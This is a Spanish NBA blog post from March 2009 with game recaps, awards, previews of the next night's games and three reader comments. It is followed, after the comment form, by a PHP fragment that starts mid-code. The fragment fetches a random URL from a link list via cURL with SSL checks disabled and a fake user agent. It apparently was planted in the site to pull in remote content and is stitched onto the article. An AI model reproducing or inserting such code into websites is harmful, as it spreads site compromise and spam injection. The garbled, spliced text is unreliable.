La crónica (La Nit de la Cremà)

20 de March de 2009 por MagicJohnson32

cavsfotoPor TheDeerHunter & MagicJohnson32

Dice la tradición que la noche de San José es el momento de tirar al fuego todo lo viejo e inservible, así como todos los vicios, defectos y problemas de los que desearíamos librarnos. La hoguera de la purificación.

No sabemos si LeBron trató de purificar a aquellos que le discuten el MVP en favor de Wade con otro triple doble decisivo más (y ya van 7 esta temporada) pero los Cavs jugaron con fuego contra los Blazers hasta bien entrada la prórroga. El recién repescado Joe Smith lo hizo bien. Seguro que el bueno de Joe también desearía quemar sus maletas y echar raíces en un lugar donde visiblemente se siente cómodo, en vez de estar toda la vida dando tumbos por equipos en los que no sabemos muy bien por qué no ha terminado de cuajar nunca. Le deseamos lo mejor, por lo buen profesional que es. Nos parece que los Cavs son mejor equipo con él.

Tampoco sabemos demasiado bien si sería McMillan quien se desharía de Sergio y Rudy o bien serían éstos quienes lo lanzarían sádicamente a la hoguera. Nos imaginamos más bien lo segundo, porque a McMillan tampoco parece irle demasiado mal sin darles apenas bola a los nuestros. Al fin y al cabo ahí anda bien colocado y anoche estuvo a un pelo de dar la campanada en el Quicken Loans sin Aldridge ni Batum, aunque con Oden. En Portland no saben si quemar sus lesiones, a él o a los bares nocturnos que frecuenta…

En L.A. la gente está más que acostumbrada a jugar con fuego. Esta temporada los Lakers han demostrado una cierta superioridad contra sus rivales directos pero se han mostrado vulnerables contra equipos de medio pelo. Al equipo se le ve por momentos física y mentalmente más quemado que la pipa de un indio, aunque hasta el momento el incombustible Gasol se mantiene como “Ninot indultat”. Lo evidente es que han bajado un pistón y Kobe ha renunciado al MVP que ya posee en la búsqueda de una traca mucho más potente. No podemos decir que sea una mala decisión.

kobeAnoche, el equipo “fuegos artificiales” de la liga, los Warriors, de la mano de Monta Ellis y Azubuike les pusieron las cosas bien difíciles. Al rescate, Gasolution, un buen Odom, Kobe tirándose hasta las zapas y un Vujacic inéditamente impecable.

Los que han estado para tirarlos a la hoguera toda la temporada son la mayoría de compañeros del señor Nowitzki. Anoche lo tenían mal en su visita a Atlanta. Pero si el segundo mejor jugador tiene que ser Ryan Hollins en un equipo como Dallas, apaga y vámonos. Los Lakers se están frotando las manos para la primera ronda… y eso que está confirmado que Devean George no la jugará. Lástima.

PREMIOS

MVP: No pudo evitar la prórroga, pero los 5 minutos extras sirvieron a LeBron James para anotarse el séptimo triple doble de la temporada. 26 puntos, 11 rebotes y 10 asistencias logró en el ajustado triunfo sobre los Blazers.

El rookie: Jugaron pocos novatos anoche y ninguno de ellos hizo méritos suficientes para llevarse el premio. En todo caso, Greg Oden se las apañó para conseguir 7 puntos, 9 rebotes y ¡5 faltas! en apenas 12 minutos de juego.

La sorpresa: De algún lugar en lo más profundo del banquillo de los Mavs apareció Ryan Hollins para, ante la lesión de Dampier, jugar como titular y lograr 13 puntos y 7 rebotes. Aunque para sorpresa, el mate royjoede Luke Walton en cara de Turiaf. Digamos que los conceptos “Luke Walton” y “mate en la cara” no acostumbran a estar relacionados.

La decepción: Vaya racha lleva Kidd. En los últimos tres partidos acumula 6 de 25 en tiros de campo para una media de 6.3 puntos. Anoche 2 de 8 para un total de 8 puntos en casi 40 minutos.

El mayor esfuerzo en vano: Sin Aldridge, Roy estuvo a punto de conducir a los Blazers a una improbable victoria en el prácticamente inexpugnable Quicken Loans. A sus 24 puntos unió 7 rebotes y 7 asistencias que finalmente no fueron suficientes ante LreBon y compañía.

RAZONES PARA TRASNOCHAR

De los once partidos que se disputarán a partir de la próxima medianoche, sólo uno enfrenta a dos equipos de la zona noble.

Celtics @ Spurs (1.30 h GMT+1). El dominio de Lakers y Cavs en sus respectivas conferencias ha restado algo de la credibilidad de Celtics y, sobre todo, Spurs como favoritos. Sin embargo, el duelo entre los dos últimos campeones es uno de los grandes partidos del año. Duncan regresa tras descansar un partido, y en los Celtics permanece la duda del estado de Ray Allen y Kevin Garnett, quien puede volver tras perderse los últimos 13 partidos. Ambos equipos necesitan la victoria, no ya para mantener la persecución sobre los líderes sino pensando en conservar la segunda posición de la Conferencia y la ventaja de campo en una hipotética segunda ronda de Playoffs.

Seguiremos de cerca, además, a… Vince Carter. Atraviesa un gran momento, con 34 puntos de media en los últimos tres partidos. Confirmada la ausencia de Devin Harris, y en duda la participación de Dwyane Wade, el Nets-Heat puede ser cosa suya. Si finalmente juega Wade, también caerá sobre Carter la responsabilidad de hacer que su equipo sea capaz de plantar cara.

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Vaya numerito montan los Cavs antes del partido. Creo que se pasan, la verdad. Anoche (vi el principio del partido, no todo) estuvieron un rato con la cosa esa de la foto, los saludos militares, luego lo de los polvitos al aire… Parecen los Harlem Globber Trotters.

      Citar

  2. TheDeerHunter dice:
    #2

    Diría que ese es el principal motivo de que Lebron me carga un tanto… y para colmo lo de los polvitos ni siquiera es original.

      Citar

  3. univerzee dice:
    #3

    En la crema podría haber ardido todo el partido de ayer, desde la tonteria de la foto, los polvitos y sobretodo los dos primeros cuartos con un porcentaje de tiro cercano al 30%, y despues acabaron en el 40%. Me refiero al CLE-POR. Y si, sin problemas podría caer en la hogera McM, y Rudy, fallón, fallón… eso sí Oden no se si va de bares con Sneijder pero excepto su problema de faltas, grave, pero por ayudas, es un gran jugador, y lo será. LBJ será MVP, habrá conseguido su 7º triple doble, pero debe engrasar sus mecanismos de reconocimiento del juego o contra BOS, si llega BOS, lo pasará mal, con sus facultades y cada día penetra menos, peligroso ya con esa edad dejar de entrar a canasta. Ojo es un crack. Aunque el factor desequilibrante si lo hay para CLE será DWest jugando de 2… a poco que MWilliams vuelva a dedicarse a jugar para todos y no sólo para el.
    Hacia tiempo que no os leía, la organización de favoritos os habia colocado en la “t” y eso esta muy abajo, os subo para arriba, Saludos!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>